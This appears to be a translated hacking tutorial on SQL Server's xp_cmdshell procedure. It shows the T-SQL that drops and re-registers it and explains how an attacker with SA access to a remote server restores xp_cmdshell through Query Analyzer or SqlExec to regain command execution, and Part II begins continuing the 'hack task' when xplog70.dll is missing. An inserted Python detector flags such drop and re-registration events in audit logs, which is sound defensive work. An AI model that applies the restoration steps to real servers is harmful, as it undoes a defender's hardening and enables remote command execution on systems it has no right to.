Required tools: SQL Query Analyzer and SqlExec (sunx version)
Part I:
Analysis and summary of protecting a system by removing xp_cmdshell:
First, the statements to know:
1. To remove the xp_cmdshell extended stored procedure, use the following statement:
if exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and
OBJECTPROPERTY(id, N'IsExtendedProc') = 1) exec sp_dropextendedproc N'[dbo].[xp_cmdshell]'
2. To add the xp_cmdshell extended stored procedure, use the following statement:
sp_addextendedproc xp_cmdshell, @dllname = 'xplog70.dll'
Now look at the symptom:
We have SA permission on the remote server and run a cmd command with SqlExec, but a SQL_ERROR prompt appears. In that case it is very likely that xp_cmdshell has been removed.
Now look at two ways to restore xp_cmdshell after it has been removed:
Method one: connect to the other side directly with SQL Query Analyzer and run the following statement, which is very convenient:
sp_addextendedproc xp_cmdshell, @dllname = 'xplog70.dll'
Method two: use SqlExec (sunx version). First fill in %s in the Format option, then in the CMD option enter sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll' or, for SQL 2000, sp_addextendedproc 'xp_cmdshell', 'xplog70.dll'. Removing xp_cmdshell with SqlExec (sunx version) works the same way as adding it: select the same options, then enter sp_dropextendedproc 'xp_cmdshell'.
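Seen from the server side, both statements above leave recognisable statement text behind. The following is an added example, not part of the original article: a small detector that reviews captured statement text for xp_cmdshell being dropped or re-registered. The (time, login, statement) record layout, the sample rows and the function names are assumptions made for illustration.

```python
import re

# The two procedures the article uses, however the call is written:
# with or without EXEC, N'...' literals, [dbo].[...] brackets or @dllname=.
CALL = re.compile(
    r"\b(?P<proc>sp_addextendedproc|sp_dropextendedproc)\b(?P<args>[^;]*)",
    re.IGNORECASE,
)
TARGET = re.compile(r"\bxp_cmdshell\b", re.IGNORECASE)
DLL = re.compile(r"[A-Za-z0-9_]+\.dll", re.IGNORECASE)
KNOWN_DLLS = {"xplog70.dll", "xpsql70.dll"}  # the two DLL names the article mentions


def classify(statement):
    """Return (action, dll) if the statement adds or drops xp_cmdshell, else None."""
    m = CALL.search(statement)
    if not m or not TARGET.search(m.group("args")):
        return None
    action = "add" if m.group("proc").lower() == "sp_addextendedproc" else "drop"
    dll = DLL.search(m.group("args"))
    return action, (dll.group(0).lower() if dll else None)


def review(events):
    """events: iterable of (time, login, statement) taken from a trace or audit log."""
    findings = []
    for when, login, statement in events:
        hit = classify(statement)
        if hit is None:
            continue
        action, dll = hit
        if action == "drop":
            note = "xp_cmdshell unregistered"
        elif dll in KNOWN_DLLS:
            note = "xp_cmdshell re-registered"
        else:
            note = "xp_cmdshell registered against unexpected or missing DLL"
        findings.append((when, login, action, dll, note))
    return findings


# Constructed sample records (not real log data).
SAMPLE = [
    ("10:00:01", "sa", "select name from sysobjects where xtype = 'X'"),
    ("10:00:05", "sa", "exec sp_dropextendedproc N'[dbo].[xp_cmdshell]'"),
    ("10:02:40", "sa", "Sp_addextendedproc xp_cmdshell, @dllname = 'Xplog70.dll'"),
    ("10:03:10", "sa", "sp_addextendedproc 'xp_cmdshell', 'other.dll'"),
    ("10:04:00", "app", "exec sp_addextendedproc 'xp_other', 'xplog70.dll'"),
]

if __name__ == "__main__":
    for finding in review(SAMPLE):
        print(finding)
```

A re-registration on a server where xp_cmdshell was deliberately removed is the event worth alerting on, whichever login issued it.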
Part II:
If the other party has deleted or renamed xplog70.dll, we will continue our hack task in the following ways:
The following symptom suggests that xplog70.dll has likely been deleted or renamed.
Running sp_addextendedproc xp_cmdshell, @dllname = 'xplog70.dll' in Query Analyzer reports that an object named 'xp_cmdshell' already exists in the database.